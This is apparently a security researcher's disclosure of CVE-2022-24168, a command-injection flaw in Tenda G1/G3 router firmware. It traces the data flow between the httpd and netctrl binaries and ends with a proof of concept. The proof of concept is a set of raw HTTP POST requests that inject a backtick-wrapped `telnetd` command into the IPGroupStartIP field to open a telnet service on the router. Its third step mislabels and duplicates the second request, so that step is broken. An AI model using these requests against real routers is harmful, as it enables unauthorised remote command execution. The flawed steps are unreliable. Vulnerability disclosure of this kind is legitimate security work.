Headline
CVE-2022-24168: my_vuln/37.md at main · pjqwudi/my_vuln
Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetIpGroup. This vulnerability allows attackers to execute arbitrary commands via the IPGroupStartIP and IPGroupEndIP parameters.
Tenda Vulnerability
Vendor:Tenda
Product:G1、G3
Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In httpd binary:
In formSetIpGroup function, IPGroupStartIP、IPGroupEndIP is directly passed by the attacker, so we can control the IPGroupStartIP、IPGroupEndIP to attack the OS.
First, make corresponding settings according to the selected network mode. This vulnerability occurs in the formSetWanRouteRule function. We mainly explain the data flow of this part.
Here, enter the function getNewWanRouteRule for the next data flow tracking.
The part that gets the user input is in the function getIpSecTunnelSettings.
Here, the user input is extracted through the get_item_in_list function.(bhv.ipgroup.list) We can fully control this input. We will describe this part in detail later. Let us continue to explore the process triggered by the vulnerability.
As you can see here, in addWanRouteRule function, the input has not been checked. And then, call the function SetValue to store this input.
This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.It should be noted that here you need to ensure that the value of wans.policy.type is 0.
In netctrl binary:
In route_set_user_policy_rule function, the initial input will be extracted and cause command injection.
Now let’s sort out the above two questions:
- Need to be able to control the value of
bhv.ipgroup.list(from user input) - Need to make the value of
wans.policy.type0
for Q1:
In formSetIpGroup function, IPGroupStartIP、IPGroupEndIP is directly passed by the attacker, so we can control the value of IPGroupStartIP、IPGroupEndIP.
So far we understand that the user input is extracted in the function getNewIpGroup and stored in the router configuration in the function addIpGroup.
for Q2:
In formSetWanRoutePolicy function, wanRoutePolicyType is directly passed by the attacker, so we can control the value of wanRoutePolicyType.
We want to make the value of wans.policy.type 0, just need wanRoutePolicyType to be custom.
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
Vulnerability trigger steps:
- set
wanRoutePolicyType=custom, in (wanRoutePolicyType) - set
IPGroupStartIP=telnetd, in (formSetIpGroup) - set wan route rule, in (
formSetWanRouteRule)
PoC
set wanRoutePolicyType =custom, in (wanRoutePolicyType)
POST /goform/setWanRoutePolicy HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 59 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/behavior/multiWan.html?0.9165846025889601 Cookie: _:USERNAME:_=; G3v3_user=
wanRoutePolicyType=custom&selectAll=false&wanDetectEn=false
set IPGroupStartIP=telnetd, in (formSetIpGroup)
POST /goform/setIPGroup HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/behavior/ipTimeGroup.html?0.628992489383655 Cookie: _:USERNAME:_=; G3v3_user=
IPGroupIndex=0&IPGroupName=pjqwudi&IPGroupStartIP=`telnetd`&IPGroupEndIP=192.168.1.5
set wan route rule, in (formSetWanRouteRule)
POST /goform/setIPGroup HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/behavior/ipTimeGroup.html?0.628992489383655 Cookie: _:USERNAME:_=; G3v3_user=
IPGroupIndex=0&IPGroupName=pjqwudi&IPGroupStartIP=`telnetd`&IPGroupEndIP=192.168.1.5
Result
The target router has enabled the telnet service.
